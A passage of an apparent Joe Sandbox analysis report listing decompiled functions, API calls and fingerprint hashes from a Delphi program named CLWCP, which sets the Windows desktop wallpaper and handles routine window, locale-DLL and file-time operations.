                                  					E00404428( &_v8, "\\clwcp.bmp", _v28);
                                  				}
                                  				E00402ACC(2,  &_v32);
                                  				if(E004043DC(_v32) > 0) {
                                  					_t186 = 0;
                                  					E00402ACC(2,  &_v40);
                                  					E00407D2C(_v40, _t156,  &_v36);
                                  					E00404528(_v36, 0x46d274);
                                  					if(0 == 0) {
                                  						_t186 = 1;
                                  					}
                                  					E00402ACC(2,  &_v48);
                                  					E00407D2C(_v48, _t156,  &_v44);
                                  					E00404528(_v44, "stretch");
                                  					if(0 == 0) {
                                  						_t186 = 2;
                                  					}
                                  					_t188 = E004026E4(3);
                                  					_t155 = E004026E4(3);
                                  					_t155[1] = 0;
                                  					 *_t155 = 0x30;
                                  					_t188[1] = 0;
                                  					_t103 = _t186 - 1;
                                  					_t196 = _t103;
                                  					if(_t196 < 0) {
                                  						 *_t188 = 0x30;
                                  					} else {
                                  						if(_t196 == 0) {
                                  							 *_t188 = 0x31;
                                  						} else {
                                  							if(_t103 == 1) {
                                  								 *_t188 = 0x32;
                                  							}
                                  						}
                                  					}
                                  					RegOpenKeyExA(0x80000001, "control panel", 0, 0xf003f,  &_v12);
                                  					RegOpenKeyExA(_v12, "desktop", 0, 0xf003f,  &_v12);
                                  					if(_t186 != 2) {
                                  						RegSetValueExA(_v12, "TileWallpaper", 0, 1, _t188, 1);
                                  						RegSetValueExA(_v12, "Wallpaperstyle", 0, 1, _t155, 1);
                                  					} else {
                                  						RegSetValueExA(_v12, "TileWallpaper", 0, 1, _t155, 1);
                                  						RegSetValueExA(_v12, "Wallpaperstyle", 0, 1, _t188, 1);
                                  					}
                                  					RegFlushKey(_v12);
                                  					RegCloseKey(_v12);
                                  					E00402704(_t188);
                                  					E00402704(_t155);
                                  				}
                                  				_t154 = E004045DC(_v8);
                                  				SystemParametersInfoA(0x14, 0, _t154, 1);
                                  				SystemParametersInfoA(0x14, 0, _t154, 2);
                                  				goto L22;
                                  			}



























                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000001,control panel,00000000,000F003F,?,00000000,0046D23E,?,?,?,?,00000004,00000000,00000000), ref: 0046D160
                                  • RegOpenKeyExA.ADVAPI32(?,desktop,00000000,000F003F,?,80000001,control panel,00000000,000F003F,?,00000000,0046D23E), ref: 0046D179
                                  • RegSetValueExA.ADVAPI32(?,TileWallpaper,00000000,00000001,00000000,00000001,?,desktop,00000000,000F003F,?,80000001,control panel,00000000,000F003F,?), ref: 0046D193
                                  • RegSetValueExA.ADVAPI32(?,Wallpaperstyle,00000000,00000001,00000000,00000001,?,TileWallpaper,00000000,00000001,00000000,00000001,?,desktop,00000000,000F003F), ref: 0046D1A8
                                  • RegSetValueExA.ADVAPI32(?,TileWallpaper,00000000,00000001,00000000,00000001,?,desktop,00000000,000F003F,?,80000001,control panel,00000000,000F003F,?), ref: 0046D1BF
                                  • RegSetValueExA.ADVAPI32(?,Wallpaperstyle,00000000,00000001,00000000,00000001,?,TileWallpaper,00000000,00000001,00000000,00000001,?,desktop,00000000,000F003F), ref: 0046D1D4
                                  • RegFlushKey.ADVAPI32(?,?,Wallpaperstyle,00000000,00000001,00000000,00000001,?,TileWallpaper,00000000,00000001,00000000,00000001,?,desktop,00000000), ref: 0046D1DD
                                  • RegCloseKey.ADVAPI32(?,?,?,Wallpaperstyle,00000000,00000001,00000000,00000001,?,TileWallpaper,00000000,00000001,00000000,00000001,?,desktop), ref: 0046D1E6
                                  • SystemParametersInfoA.USER32(00000014,00000000,00000000,00000001), ref: 0046D20A
                                  • SystemParametersInfoA.USER32(00000014,00000000,00000000,00000002), ref: 0046D216
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Value$InfoOpenParametersSystem$CloseFlush
                                  • String ID: TileWallpaper$Wallpaperstyle$\clwcp.bmp$control panel$desktop$stretch$tile
                                  • API String ID: 3473239184-3812037043
                                  • Opcode ID: eb66159df3f5a1c45ceef8b8c2b8b197441494a6d078b489aab02ad6eacad25b
                                  • Instruction ID: d6c79ffcc8eb494e13f39c39c31a48f565c435968f6ca50b5fa99879c1bea40a
                                  • Opcode Fuzzy Hash: eb66159df3f5a1c45ceef8b8c2b8b197441494a6d078b489aab02ad6eacad25b
                                  • Instruction Fuzzy Hash: 4F714330F50209ABDB10EBA5C886FDD77A5AF49704F1040B6F604BF2D6D6B8AD01CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 95%
                                  			E004554C4(struct HWND__* __eax, void* __ecx, struct HWND__* __edx) {
                                  				struct HWND__* _v8;
                                  				struct HWND__* _v12;
                                  				void* __ebx;
                                  				void* __esi;
                                  				void* __ebp;
                                  				signed int _t161;
                                  				struct HWND__* _t162;
                                  				struct HWND__* _t163;
                                  				void* _t166;
                                  				struct HWND__* _t176;
                                  				struct HWND__* _t185;
                                  				struct HWND__* _t188;
                                  				struct HWND__* _t189;
                                  				struct HWND__* _t191;
                                  				struct HWND__* _t197;
                                  				struct HWND__* _t199;
                                  				struct HWND__* _t202;
                                  				struct HWND__* _t205;
                                  				struct HWND__* _t206;
                                  				struct HWND__* _t216;
                                  				struct HWND__* _t217;
                                  				struct HWND__* _t222;
                                  				struct HWND__* _t224;
                                  				struct HWND__* _t227;
                                  				struct HWND__* _t231;
                                  				struct HWND__* _t239;
                                  				struct HWND__* _t248;
                                  				struct HWND__* _t252;
                                  				struct HWND__* _t254;
                                  				struct HWND__* _t255;
                                  				struct HWND__* _t267;
                                  				intOrPtr _t270;
                                  				struct HWND__* _t273;
                                  				struct HWND__* _t274;
                                  				struct HWND__* _t276;
                                  				intOrPtr* _t277;
                                  				struct HWND__* _t285;
                                  				struct HWND__* _t287;
                                  				void* _t307;
                                  				signed int _t309;
                                  				struct HWND__* _t315;
                                  				struct HWND__* _t316;
                                  				struct HWND__* _t317;
                                  				void* _t318;
                                  				intOrPtr _t342;
                                  				struct HWND__* _t346;
                                  				intOrPtr _t368;
                                  				void* _t372;
                                  				struct HWND__* _t377;
                                  				void* _t378;
                                  				void* _t379;
                                  				intOrPtr _t380;
                                  
                                  				_t318 = __ecx;
                                  				_push(_t372);
                                  				_v12 = __edx;
                                  				_v8 = __eax;
                                  				_push(_t379);
                                  				_push(0x455b85);
                                  				_push( *[fs:edx]);
                                  				 *[fs:edx] = _t380;
                                  				 *(_v12 + 0xc) = 0;
                                  				_t307 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xb0)) + 8)) - 1;
                                  				if(_t307 < 0) {
                                  					L5:
                                  					E00455378(_v8, _t318, _v12);
                                  					_t309 =  *_v12;
                                  					_t161 = _t309;
                                  					__eflags = _t161 - 0x53;
                                  					if(__eflags > 0) {
                                  						__eflags = _t161 - 0xb017;
                                  						if(__eflags > 0) {
                                  							__eflags = _t161 - 0xb020;
                                  							if(__eflags > 0) {
                                  								_t162 = _t161 - 0xb031;
                                  								__eflags = _t162;
                                  								if(_t162 == 0) {
                                  									_t163 = _v12;
                                  									__eflags =  *((intOrPtr*)(_t163 + 4)) - 1;
                                  									if( *((intOrPtr*)(_t163 + 4)) != 1) {
                                  										 *(_v8 + 0xb8) =  *(_v12 + 8);
                                  									} else {
                                  										 *(_v12 + 0xc) =  *(_v8 + 0xb8);
                                  									}
                                  									L104:
                                  									_t166 = 0;
                                  									_pop(_t342);
                                  									 *[fs:eax] = _t342;
                                  									goto L105;
                                  								}
                                  								__eflags = _t162 + 0xfffffff2 - 2;
                                  								if(_t162 + 0xfffffff2 - 2 < 0) {
                                  									 *(_v12 + 0xc) = E00457A50(_v8,  *(_v12 + 8), _t309) & 0x0000007f;
                                  								} else {
                                  									L103:
                                  									E0045543C(_t379); // executed
                                  								}
                                  								goto L104;
                                  							}
                                  							if(__eflags == 0) {
                                  								_t176 = _v12;
                                  								__eflags =  *(_t176 + 4);
                                  								if( *(_t176 + 4) != 0) {
                                  									E004562D0(_v8, _t318,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4)));
                                  								} else {
                                  									E00456274(_v8,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4)));
                                  								}
                                  								goto L104;
                                  							}
                                  							_t185 = _t161 - 0xb01a;
                                  							__eflags = _t185;
                                  							if(_t185 == 0) {
                                  								_t188 = IsIconic( *(_v8 + 0x30));
                                  								__eflags = _t188;
                                  								if(_t188 == 0) {
                                  									_t189 = GetFocus();
                                  									_t346 = _v8;
                                  									__eflags = _t189 -  *((intOrPtr*)(_t346 + 0x30));
                                  									if(_t189 ==  *((intOrPtr*)(_t346 + 0x30))) {
                                  										_t191 = E0044C664(0);
                                  										__eflags = _t191;
                                  										if(_t191 != 0) {
                                  											SetFocus(_t191);
                                  										}
                                  									}
                                  								}
                                  								goto L104;
                                  							}
                                  							__eflags = _t185 == 5;
                                  							if(_t185 == 5) {
                                  								L92:
                                  								E00456824(_v8,  *(_v12 + 8),  *(_v12 + 4) & 0x0000ffff);
                                  								goto L104;
                                  							} else {
                                  								goto L103;
                                  							}
                                  						}
                                  						if(__eflags == 0) {
                                  							_t197 =  *(_v8 + 0x44);
                                  							__eflags = _t197;
                                  							if(_t197 != 0) {
                                  								_t311 = _t197;
                                  								_t199 = E0043BA58(_t197);
                                  								__eflags = _t199;
                                  								if(_t199 != 0) {
                                  									_t202 = IsWindowEnabled(E0043BA58(_t311));
                                  									__eflags = _t202;
                                  									if(_t202 != 0) {
                                  										_t205 = IsWindowVisible(E0043BA58(_t311));
                                  										__eflags = _t205;
                                  										if(_t205 != 0) {
                                  											 *0x46ef44 = 0;
                                  											_t206 = GetFocus();
                                  											SetFocus(E0043BA58(_t311));
                                  											E00435DE4(_t311,  *(_v12 + 4), 0x112,  *(_v12 + 8));
                                  											SetFocus(_t206);
                                  											 *0x46ef44 = 1;
                                  											 *(_v12 + 0xc) = 1;
                                  										}
                                  									}
                                  								}
                                  							}
                                  							goto L104;
                                  						}
                                  						__eflags = _t161 - 0xb000;
                                  						if(__eflags > 0) {
                                  							_t216 = _t161 - 0xb001;
                                  							__eflags = _t216;
                                  							if(_t216 == 0) {
                                  								_t217 = _v8;
                                  								__eflags =  *((short*)(_t217 + 0x132));
                                  								if( *((short*)(_t217 + 0x132)) != 0) {
                                  									 *((intOrPtr*)(_v8 + 0x130))();
                                  								}
                                  								goto L104;
                                  							}
                                  							__eflags = _t216 == 0x15;
                                  							if(_t216 == 0x15) {
                                  								_t222 = E00456034(_v8, _t318, _v12);
                                  								__eflags = _t222;
                                  								if(_t222 != 0) {
                                  									 *(_v12 + 0xc) = 1;
                                  								}
                                  								goto L104;
                                  							} else {
                                  								goto L103;
                                  							}
                                  						}
                                  						if(__eflags == 0) {
                                  							_t224 = _v8;
                                  							__eflags =  *((short*)(_t224 + 0x13a));
                                  							if( *((short*)(_t224 + 0x13a)) != 0) {
                                  								 *((intOrPtr*)(_v8 + 0x138))();
                                  							}
                                  							goto L104;
                                  						}
                                  						_t227 = _t161 - 0x112;
                                  						__eflags = _t227;
                                  						if(_t227 == 0) {
                                  							_t231 = ( *(_v12 + 4) & 0x0000fff0) - 0xf020;
                                  							__eflags = _t231;
                                  							if(_t231 == 0) {
                                  								E00455BEC(_v8);
                                  							} else {
                                  								__eflags = _t231 == 0x100;
                                  								if(_t231 == 0x100) {
                                  									E00455CB0(_v8);
                                  								} else {
                                  									E0045543C(_t379);
                                  								}
                                  							}
                                  							goto L104;
                                  						}
                                  						_t239 = _t227 + 0xffffffe0 - 7;
                                  						__eflags = _t239;
                                  						if(_t239 < 0) {
                                  							 *(_v12 + 0xc) = SendMessageA( *(_v12 + 8), _t309 + 0xbc00,  *(_v12 + 4),  *(_v12 + 8));
                                  							goto L104;
                                  						}
                                  						__eflags = _t239 == 0x1e1;
                                  						if(_t239 == 0x1e1) {
                                  							E00427D90(E00427C2C());
                                  							goto L104;
                                  						} else {
                                  							goto L103;
                                  						}
                                  					}
                                  					if(__eflags == 0) {
                                  						goto L92;
                                  					}
                                  					__eflags = _t161 - 0x14;
                                  					if(__eflags > 0) {
                                  						__eflags = _t161 - 0x1d;
                                  						if(__eflags > 0) {
                                  							_t248 = _t161 - 0x37;
                                  							__eflags = _t248;
                                  							if(_t248 == 0) {
                                  								 *(_v12 + 0xc) = E00455BD0(_v8);
                                  								goto L104;
                                  							}
                                  							__eflags = _t248 == 0x13;
                                  							if(_t248 == 0x13) {
                                  								_t252 = _v12;
                                  								__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t252 + 8)))) - 0xde534454;
                                  								if( *((intOrPtr*)( *((intOrPtr*)(_t252 + 8)))) == 0xde534454) {
                                  									_t254 = _v8;
                                  									__eflags =  *((char*)(_t254 + 0xa6));
                                  									if( *((char*)(_t254 + 0xa6)) != 0) {
                                  										_t255 = _v8;
                                  										__eflags =  *(_t255 + 0xa8);
                                  										if( *(_t255 + 0xa8) != 0) {
                                  											 *(_v12 + 0xc) = 0;
                                  										} else {
                                  											_t315 = E0040D158("vcltest3.dll", _t309, 0x8000);
                                  											 *(_v8 + 0xa8) = _t315;
                                  											__eflags = _t315;
                                  											if(_t315 == 0) {
                                  												 *(_v12 + 0xc) = GetLastError();
                                  												 *(_v8 + 0xa8) = 0;
                                  											} else {
                                  												 *(_v12 + 0xc) = 0;
                                  												_t377 = GetProcAddress( *(_v8 + 0xa8), "RegisterAutomation");
                                  												_t316 = _t377;
                                  												__eflags = _t377;
                                  												if(_t377 != 0) {
                                  													_t267 =  *(_v12 + 8);
                                  													_t316->i( *((intOrPtr*)(_t267 + 4)),  *((intOrPtr*)(_t267 + 8)));
                                  												}
                                  											}
                                  										}
                                  									}
                                  								}
                                  								goto L104;
                                  							} else {
                                  								goto L103;
                                  							}
                                  						}
                                  						if(__eflags == 0) {
                                  							_t270 =  *0x470b44; // 0x0
                                  							E004546D4(_t270);
                                  							E0045543C(_t379);
                                  							goto L104;
                                  						}
                                  						_t273 = _t161 - 0x16;
                                  						__eflags = _t273;
                                  						if(_t273 == 0) {
                                  							_t274 = _v12;
                                  							__eflags =  *(_t274 + 4);
                                  							if( *(_t274 + 4) != 0) {
                                  								E0040CBB0();
                                  								E00404028();
                                  							}
                                  							goto L104;
                                  						}
                                  						_t276 = _t273 - 4;
                                  						__eflags = _t276;
                                  						if(_t276 == 0) {
                                  							_t277 =  *0x46fd70; // 0x470aa0
                                  							E004409E4( *_t277, _t318,  *(_v12 + 4));
                                  							E004553D0(_v8, _t309, _t318, _v12, _t372);
                                  							E0045543C(_t379);
                                  							goto L104;
                                  						}
                                  						__eflags = _t276 == 2;
                                  						if(_t276 == 2) {
                                  							E0045543C(_t379);
                                  							_t285 = _v12;
                                  							__eflags =  *((intOrPtr*)(_t285 + 4)) - 1;
                                  							asm("sbb eax, eax");
                                  							 *((char*)(_v8 + 0xa5)) = _t285 + 1;
                                  							_t287 = _v12;
                                  							__eflags =  *(_t287 + 4);
                                  							if( *(_t287 + 4) == 0) {
                                  								E00455144();
                                  								PostMessageA( *(_v8 + 0x30), 0xb001, 0, 0);
                                  							} else {
                                  								E004551A4(_v8);
                                  								PostMessageA( *(_v8 + 0x30), 0xb000, 0, 0);
                                  							}
                                  							goto L104;
                                  						} else {
                                  							goto L103;
                                  						}
                                  					}
                                  					if(__eflags == 0) {
                                  						 *_v12 = 0x27;
                                  						E0045543C(_t379);
                                  						goto L104;
                                  					}
                                  					__eflags = _t161 - 0x11;
                                  					if(_t161 > 0x11) {
                                  						goto L103;
                                  					}
                                  					switch( *((intOrPtr*)(_t161 * 4 +  &M00455568))) {
                                  						case 0:
                                  							0 = E0041990C(0, __ebx, __edi, __esi);
                                  							goto L104;
                                  						case 1:
                                  							goto L103;
                                  						case 2:
                                  							_push(0);
                                  							_push(0);
                                  							_push(0xb01a);
                                  							_v8 =  *(_v8 + 0x30);
                                  							_push( *(_v8 + 0x30));
                                  							L00406904();
                                  							__eax = E0045543C(__ebp);
                                  							goto L104;
                                  						case 3:
                                  							__eax = _v12;
                                  							__eflags =  *(__eax + 4);
                                  							if( *(__eax + 4) == 0) {
                                  								__eax = E0045543C(__ebp);
                                  								__eax = _v8;
                                  								__eflags =  *(__eax + 0xb4);
                                  								if( *(__eax + 0xb4) == 0) {
                                  									__eax = _v8;
                                  									__eax =  *(_v8 + 0x30);
                                  									__eax = E0044C504( *(_v8 + 0x30), __ebx, __edi, __esi);
                                  									__edx = _v8;
                                  									 *(_v8 + 0xb4) = __eax;
                                  								}
                                  								_v8 = L0045514C();
                                  							} else {
                                  								__eflags =  *0x46ef58;
                                  								if( *0x46ef58 == 0) {
                                  									_v8 = E004551A4(_v8);
                                  									__eax = _v8;
                                  									__eax =  *(_v8 + 0xb4);
                                  									__eflags = __eax;
                                  									if(__eax != 0) {
                                  										__eax = _v8;
                                  										__edx = 0;
                                  										__eflags = 0;
                                  										 *(_v8 + 0xb4) = 0;
                                  									}
                                  								}
                                  								__eax = E0045543C(__ebp);
                                  							}
                                  							goto L104;
                                  						case 4:
                                  							__eax = _v8;
                                  							__eax =  *(_v8 + 0x30);
                                  							_push(__eax);
                                  							L00406864();
                                  							__eflags = __eax;
                                  							if(__eax == 0) {
                                  								__eax = E0045543C(__ebp);
                                  							} else {
                                  								__eax = E00455478(__ebp);
                                  							}
                                  							goto L104;
                                  						case 5:
                                  							__eax = _v8;
                                  							__eax =  *(_v8 + 0x44);
                                  							__eflags = __eax;
                                  							if(__eax != 0) {
                                  								__eax = E00452770(__eax, __ecx);
                                  							}
                                  							goto L104;
                                  						case 6:
                                  							__eax = _v12;
                                  							 *(_v12 + 0xc) = 1;
                                  							goto L104;
                                  					}
                                  				} else {
                                  					_t317 = _t307 + 1;
                                  					_t378 = 0;
                                  					L2:
                                  					L2:
                                  					if( *((intOrPtr*)(E00413D2C( *((intOrPtr*)(_v8 + 0xb0)), _t378)))() == 0) {
                                  						goto L4;
                                  					} else {
                                  						_t166 = 0;
                                  						_pop(_t368);
                                  						 *[fs:eax] = _t368;
                                  					}
                                  					L105:
                                  					return _t166;
                                  					L4:
                                  					_t378 = _t378 + 1;
                                  					_t317 = _t317 - 1;
                                  					__eflags = _t317;
                                  					if(_t317 != 0) {
                                  						goto L2;
                                  					}
                                  					goto L5;
                                  				}
                                  			}
























































                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RegisterAutomation$vcltest3.dll
                                  • API String ID: 0-2963190186
                                  • Opcode ID: 68f8c3467e92a94db307a236e2a54cc1403cbb5b49ab927b9e5d294fde550756
                                  • Instruction ID: 0745ed38c5f035539d06f538548e9b7a41cfacc9965bda6e2cd1b1a9ea9d92ae
                                  • Opcode Fuzzy Hash: 68f8c3467e92a94db307a236e2a54cc1403cbb5b49ab927b9e5d294fde550756
                                  • Instruction Fuzzy Hash: 01E14C34610A04EFDB00DB69C5D9A6EB7B1AF04316F2581A6E8059B363D738EE49DB09
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 340 4054e0-405511 lstrcpyn GetThreadLocale GetLocaleInfoA 341 405517-40551b 340->341 342 4055fa-405601 340->342 343 405527-40553d lstrlen 341->343 344 40551d-405521 341->344 345 405540-405543 343->345 344->342 344->343 346 405545-40554d 345->346 347 40554f-405557 345->347 346->347 348 40553f 346->348 347->342 349 40555d-405562 347->349 348->345 350 405564-40558a lstrcpyn LoadLibraryExA 349->350 351 40558c-40558e 349->351 350->351 351->342 352 405590-405594 351->352 352->342 353 405596-4055c6 lstrcpyn LoadLibraryExA 352->353 353->342 354 4055c8-4055f8 lstrcpyn LoadLibraryExA 353->354 354->342
                                  C-Code - Quality: 61%
                                  			E004054E0() {
                                  				void* _t28;
                                  				void* _t30;
                                  				struct HINSTANCE__* _t36;
                                  				struct HINSTANCE__* _t42;
                                  				char* _t51;
                                  				void* _t52;
                                  				struct HINSTANCE__* _t59;
                                  				void* _t61;
                                  
                                  				_push(0x105);
                                  				_push( *((intOrPtr*)(_t61 - 4)));
                                  				_push(_t61 - 0x11d);
                                  				L004012A4();
                                  				GetLocaleInfoA(GetThreadLocale(), 3, _t61 - 0xd, 5); // executed
                                  				_t59 = 0;
                                  				if( *(_t61 - 0x11d) == 0 ||  *(_t61 - 0xd) == 0 &&  *((char*)(_t61 - 0x12)) == 0) {
                                  					L14:
                                  					return _t59;
                                  				} else {
                                  					_t28 = _t61 - 0x11d;
                                  					_push(_t28);
                                  					L004012AC();
                                  					_t51 = _t28 + _t61 - 0x11d;
                                  					L5:
                                  					if( *_t51 != 0x2e && _t51 != _t61 - 0x11d) {
                                  						_t51 = _t51 - 1;
                                  						goto L5;
                                  					}
                                  					_t30 = _t61 - 0x11d;
                                  					if(_t51 != _t30) {
                                  						_t52 = _t51 + 1;
                                  						if( *((char*)(_t61 - 0x12)) != 0) {
                                  							_push(0x105 - _t52 - _t30);
                                  							_push(_t61 - 0x12);
                                  							_push(_t52);
                                  							L004012A4();
                                  							_t59 = LoadLibraryExA(_t61 - 0x11d, 0, 2);
                                  						}
                                  						if(_t59 == 0 &&  *(_t61 - 0xd) != 0) {
                                  							_push(0x105 - _t52 - _t61 - 0x11d);
                                  							_push(_t61 - 0xd);
                                  							_push(_t52);
                                  							L004012A4();
                                  							_t36 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
                                  							_t59 = _t36;
                                  							if(_t59 == 0) {
                                  								 *((char*)(_t61 - 0xb)) = 0;
                                  								_push(0x105 - _t52 - _t61 - 0x11d);
                                  								_push(_t61 - 0xd);
                                  								_push(_t52);
                                  								L004012A4();
                                  								_t42 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
                                  								_t59 = _t42;
                                  							}
                                  						}
                                  					}
                                  					goto L14;
                                  				}
                                  			}












                                  APIs
                                  • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004054F0
                                  • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004054FD
                                  • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00405503
                                  • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040552E
                                  • lstrcpyn.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405575
                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405585
                                  • lstrcpyn.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 004055AD
                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004055BD
                                  • lstrcpyn.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004055E3
                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 004055F3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                  • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                  • API String ID: 1599918012-2375825460
                                  • Opcode ID: 1c0307bdf859cac68a25c2be1f343d9d7b151e599dabd334f45a1d332d4b66c5
                                  • Instruction ID: 350faaa782958afa505727a167083beb2ef07057b49d1c98d2300e36eef25666
                                  • Opcode Fuzzy Hash: 1c0307bdf859cac68a25c2be1f343d9d7b151e599dabd334f45a1d332d4b66c5
                                  • Instruction Fuzzy Hash: 39319E71E0065C7AEB25D6B8DC46BEF67AD8B04344F4401FBA608F62C5E6BC8E848F55
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040850C(void* __eax) {
                                  				short _v6;
                                  				short _v8;
                                  				struct _FILETIME _v16;
                                  				struct _WIN32_FIND_DATAA _v336;
                                  				void* _t16;
                                  
                                  				_t16 = FindFirstFileA(E004045DC(__eax),  &_v336); // executed
                                  				if(_t16 == 0xffffffff) {
                                  					L3:
                                  					_v8 = 0xffffffff;
                                  				} else {
                                  					FindClose(_t16); // executed
                                  					if((_v336.dwFileAttributes & 0x00000010) != 0) {
                                  						goto L3;
                                  					} else {
                                  						FileTimeToLocalFileTime( &(_v336.ftLastWriteTime),  &_v16);
                                  						if(FileTimeToDosDateTime( &_v16,  &_v6,  &_v8) == 0) {
                                  							goto L3;
                                  						}
                                  					}
                                  				}
                                  				return _v8;
                                  			}









                                  APIs
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 00408527
                                  • FindClose.KERNEL32(00000000,00000000,?), ref: 00408532
                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0040854B
                                  • FileTimeToDosDateTime.KERNEL32 ref: 0040855C
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: FileTime$Find$CloseDateFirstLocal
                                  • String ID:
                                  • API String ID: 2659516521-0
                                  • Opcode ID: 6d36fbfac318439910e8bd0a072bb07faff9887ed9fffeb9dd64a1d57231916d
                                  • Instruction ID: dfc44b73f87521a87b323e5a94258fd219a89f02d2ec73349c8c5ff1fbea0109
                                  • Opcode Fuzzy Hash: 6d36fbfac318439910e8bd0a072bb07faff9887ed9fffeb9dd64a1d57231916d
                                  • Instruction Fuzzy Hash: 75F0FF7290020C7ACB20EAF58D85ACFB3BC5B09314F1006B7B559F31D2EA389B148B94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 95%
                                  			E00439164(intOrPtr* __eax, intOrPtr* __edx) {
                                  				char _v20;
                                  				short _v24;
                                  				char _v28;
                                  				short _v30;
                                  				intOrPtr _t23;
                                  				signed int _t25;
                                  				signed int _t27;
                                  				void* _t29;
                                  				signed int _t31;
                                  				void* _t38;
                                  				signed int _t39;
                                  				void* _t55;
                                  				void* _t59;
                                  				void* _t61;
                                  				struct HWND__* _t62;
                                  				signed int _t63;
                                  				signed int _t64;
                                  				intOrPtr* _t71;
                                  				signed int _t92;
                                  				signed int _t93;
                                  				short* _t96;
                                  				void* _t97;
                                  
                                  				_t96 =  &_v20;
                                  				_t71 = __edx;
                                  				_t95 = __eax;
                                  				_t23 =  *__edx;
                                  				_t97 = _t23 - 0x84;
                                  				if(_t97 > 0) {
                                  					_t25 = _t23 + 0xffffff00 - 0xa;
                                  					__eflags = _t25;
                                  					if(_t25 < 0) {
                                  						_t27 = E00435358(__eax);
                                  						__eflags = _t27;
                                  						if(_t27 != 0) {
                                  							L39:
                                  							return _t27;
                                  						}
                                  						L38:
                                  						_t29 = E00435EB4(_t95, _t71); // executed
                                  						return _t29;
                                  					}
                                  					_t31 = _t25 + 0xffffff0a - 0xb;
                                  					__eflags = _t31;
                                  					if(_t31 < 0) {
                                  						_t27 = E004390B0(__eax, __edx);
                                  						__eflags = _t27;
                                  						if(_t27 == 0) {
                                  							goto L38;
                                  						}
                                  						__eflags =  *(_t71 + 0xc);
                                  						if( *(_t71 + 0xc) != 0) {
                                  							goto L39;
                                  						}
                                  						_t27 = E0043BD58(_t95);
                                  						__eflags = _t27;
                                  						if(_t27 == 0) {
                                  							goto L39;
                                  						}
